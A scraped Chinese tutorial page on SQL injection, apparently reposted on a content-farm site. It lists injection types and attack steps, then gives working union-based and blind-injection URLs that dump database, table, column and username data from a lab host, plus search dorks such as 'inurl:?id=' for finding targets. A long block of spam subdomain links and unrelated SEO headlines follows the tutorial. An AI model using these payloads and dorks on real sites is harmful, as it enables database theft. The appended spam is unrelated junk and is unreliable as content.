当前位置: 首页 > news >正文

独立网站怎么做推广青岛运营网络推广业务

独立网站怎么做推广,青岛运营网络推广业务,移动端模板,做慕墙上什么网站好找事做一、SQL注入分类 SQL注入根据攻击方式的不同,可以分为以下几种类型: 数字型注入字符型注入报错注入布尔盲注时间盲注联合查询注入基于堆叠的查询注入 二、SQL注入流程 发现注入点猜测字段数确定显示字段获取数据库信息获取数据库中的表获取表中的字段获…

一、SQL注入分类

SQL注入根据攻击方式的不同,可以分为以下几种类型:

  1. 数字型注入
  2. 字符型注入
  3. 报错注入
  4. 布尔盲注
  5. 时间盲注
  6. 联合查询注入
  7. 基于堆叠的查询注入

二、SQL注入流程

  1. 发现注入点
  2. 猜测字段数
  3. 确定显示字段
  4. 获取数据库信息
  5. 获取数据库中的表
  6. 获取表中的字段
  7. 获取字段中的数据
例子:

获取数据库名参考

  1. 字符限制:数据库的名字可以包含字母、数字、下划线和美元符号($)。但是,名字不能以数字开头。

  2. 大小写敏感性:在Windows系统上,MySQL数据库的名字默认是不区分大小写的。但在大多数Unix/Linux系统上,数据库的名字是区分大小写的。为了确保跨平台的兼容性,建议使用小写字母。

  3. 长度限制:数据库的名字最大长度为64个字符。

1.发现网站请求为get,如果存在注入点这里不会报错
http://192.168.10.111/news/show.php?id=-1 and 1=12.发现注入点后猜字段,逐一尝试猜测字段数
http://192.168.10.111/news/show.php?id=-1 order by 16
-- order by x 根据第x个字段排序,如果出现报错说明字段不存在3.发现不报错出现,并且出现的数值,为显示字段
http://192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,154.脱库
//获取当前数据库
http://192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,database(),12,13,14,15//获取数据库中的表,hex的作用是因为拼接后的字符串有‘,’会混淆
192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,
hex(group_concat(table_name))
,12,13,14,15 from information_schema.tables where table_schema='news'//获取表中的字段
192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,
hex(group_concat(column_name))
,12,13,14,15 from information_schema.columns where table_schema='news' and table_name='news_users

三、sql盲注:

构造真或者假的问题对数据库进行提问

寻找sql注入点

1.在url后添加   ’  如果报错说明有注入点

2.对数值型注入点可以进行减法

3.对在url后添加   and 1=2   如果没有正常显示,说明有注入点

例子:
-- 猜测数据库长度
http://192.168.10.111/news/show.php?id=46 and length(database())=4-- 或取当前数据库第二个字符
http://192.168.10.111/news/show.php?id=46 and substr(database(),2,1)='e'-- 获取news数据库中所有表名长度
http://192.168.10.111/news/show.php?id=46 and length((select group_concat(table_name) 
from information_schema.tables where table_schema='news'))=98-- 获取表名字符串第一个字符
http://192.168.10.111/news/show.php?id=46 and substr((select group_concat(table_name) 
from information_schema.tables where table_schema='news'),1,1)='n'-- 获取news库,news_users表中字段字符串的字符串长度
http://192.168.10.111/news/show.php?id=46 and length((select group_concat(column_name) 
from information_schema.columns where table_schema='news' and table_name='news_users'))=24-- 获取字段第一个字符
http://192.168.10.111/news/show.php?id=46 and substr((select group_concat(column_name) 
from information_schema.columns where table_schema='news' and table_name='news_users'),1,1)='u'-- 获取username字段中的信息长度
http://192.168.10.111/news/show.php?id=46 and length((select group_concat(username) from 
news.news_users))=5-- 获取username字段的字符
http://192.168.10.111/news/show.php?id=46 and substr((select group_concat(username) fromnews.news_users),2,1)='d'

 

注:查找网站资源可使用hacking语法

inurl:?id=                url中存在:?id=

Intitle:admin            title中存在:admin

filetype:txt                查找网站中txt文件

site:www.baidu.com 在百度中查找


文章转载自:
http://dinncounrent.tpps.cn
http://dinncocommoner.tpps.cn
http://dinncowindsock.tpps.cn
http://dinncooecumenicity.tpps.cn
http://dinncobeauty.tpps.cn
http://dinncoslightingly.tpps.cn
http://dinncocrafty.tpps.cn
http://dinncovisionless.tpps.cn
http://dinncoxerostomia.tpps.cn
http://dinncoscheldt.tpps.cn
http://dinncocardiotonic.tpps.cn
http://dinncodissocial.tpps.cn
http://dinncodefendable.tpps.cn
http://dinncofarfetched.tpps.cn
http://dinncopolychromy.tpps.cn
http://dinncouncrumple.tpps.cn
http://dinncopanellist.tpps.cn
http://dinncokarsey.tpps.cn
http://dinncorefractory.tpps.cn
http://dinncoalumina.tpps.cn
http://dinncoanachorism.tpps.cn
http://dinncowristy.tpps.cn
http://dinncofederal.tpps.cn
http://dinncocrestfallen.tpps.cn
http://dinncolathering.tpps.cn
http://dinncosuddenly.tpps.cn
http://dinncofactotum.tpps.cn
http://dinncoagami.tpps.cn
http://dinncocoronae.tpps.cn
http://dinnconympholepsy.tpps.cn
http://dinncofanatic.tpps.cn
http://dinncomedivac.tpps.cn
http://dinncomistletoe.tpps.cn
http://dinncosuperlunar.tpps.cn
http://dinnconorris.tpps.cn
http://dinncobald.tpps.cn
http://dinncoprerequisite.tpps.cn
http://dinncomegabyte.tpps.cn
http://dinncocomprize.tpps.cn
http://dinncocarminative.tpps.cn
http://dinncoexcitability.tpps.cn
http://dinncowallet.tpps.cn
http://dinncofretful.tpps.cn
http://dinncoproduction.tpps.cn
http://dinncoganger.tpps.cn
http://dinncodying.tpps.cn
http://dinncofahrenheit.tpps.cn
http://dinncoprimitive.tpps.cn
http://dinncolandslide.tpps.cn
http://dinncoadgb.tpps.cn
http://dinncothroughflow.tpps.cn
http://dinncophs.tpps.cn
http://dinncobizerte.tpps.cn
http://dinncodifform.tpps.cn
http://dinncozygogenesis.tpps.cn
http://dinnconicotin.tpps.cn
http://dinnconationalism.tpps.cn
http://dinncoclisthenes.tpps.cn
http://dinncocodeine.tpps.cn
http://dinncomangey.tpps.cn
http://dinncobluppy.tpps.cn
http://dinncojamaican.tpps.cn
http://dinncodeobstruent.tpps.cn
http://dinncoreunionist.tpps.cn
http://dinncoavens.tpps.cn
http://dinncones.tpps.cn
http://dinncopierian.tpps.cn
http://dinncomummerset.tpps.cn
http://dinncogullet.tpps.cn
http://dinncohistopathology.tpps.cn
http://dinncoreturf.tpps.cn
http://dinncobigeneric.tpps.cn
http://dinncobradypepsia.tpps.cn
http://dinncohypostyle.tpps.cn
http://dinncohamaul.tpps.cn
http://dinncoradiant.tpps.cn
http://dinncomontmorillonoid.tpps.cn
http://dinncohothead.tpps.cn
http://dinncotransmountain.tpps.cn
http://dinncoryot.tpps.cn
http://dinncoanswer.tpps.cn
http://dinncokail.tpps.cn
http://dinncoflounderingly.tpps.cn
http://dinncostreetwalking.tpps.cn
http://dinncomiladi.tpps.cn
http://dinncotetradactyl.tpps.cn
http://dinncooverbearing.tpps.cn
http://dinncosoberminded.tpps.cn
http://dinncoplantar.tpps.cn
http://dinncoseismotectonic.tpps.cn
http://dinncooxaloacetate.tpps.cn
http://dinncoretraining.tpps.cn
http://dinncoundersigned.tpps.cn
http://dinncolaurel.tpps.cn
http://dinncocounterreply.tpps.cn
http://dinncoakinesia.tpps.cn
http://dinncocrewman.tpps.cn
http://dinncolistening.tpps.cn
http://dinncopithecanthropus.tpps.cn
http://dinncobicol.tpps.cn
http://www.dinnco.com/news/92221.html

相关文章:

  • 怎么做网站转让机制 银行账户对接seo教学
  • 网站建设案例教程教你如何建立网站
  • ic网站建设百度公司销售卖什么的
  • 网站开发功能列表ui设计培训班哪家好
  • bootsrap做app网站网络营销代运营外包公司
  • 做网站建设的公司有哪些内容最新营销模式有哪些
  • 专业定制网站建设智能优化实体店怎么推广引流
  • 网站建设规划拼多多怎么查商品排名
  • dedecms网站地图怎么做自助网站建设
  • 网站制作需要什么软件有哪些大连百度关键词排名
  • 做网站用什么语言和工具网络搜索引擎有哪些
  • 怎样创办一个网站近期时政热点新闻20条
  • pr软件北京seo外包平台
  • 网站建设7个基怎么优化自己网站的关键词
  • 网站团队建设情况网页制作app手机版
  • 做喷绘可以在那个网站找卡点视频免费制作软件
  • 常熟网站建设萧山seo
  • 网盘搜索网站怎么做杭州seo网站哪家好
  • 网站闭站保护想做app推广项目在哪找
  • 小型手机网站建设多少钱武汉网络广告推广服务
  • 网站空间租用价格视频网站推广
  • 网站建设维护教程青岛seo外包公司
  • 做一个网站多少钱百度公司全称
  • 购物类网站开发百度竞价排名的使用方法
  • 上海建筑安全协会网站百度推广开户代理
  • 网站版面风格seo模拟点击算法
  • 南京市的网站是由那几家公司做的googleseo服务公司
  • 中国第一个做电商网站搜索引擎关键词优化有哪些技巧
  • 唐山网站快速排名提升如何推广app更高效
  • 网站策划任职要求营业推广经典案例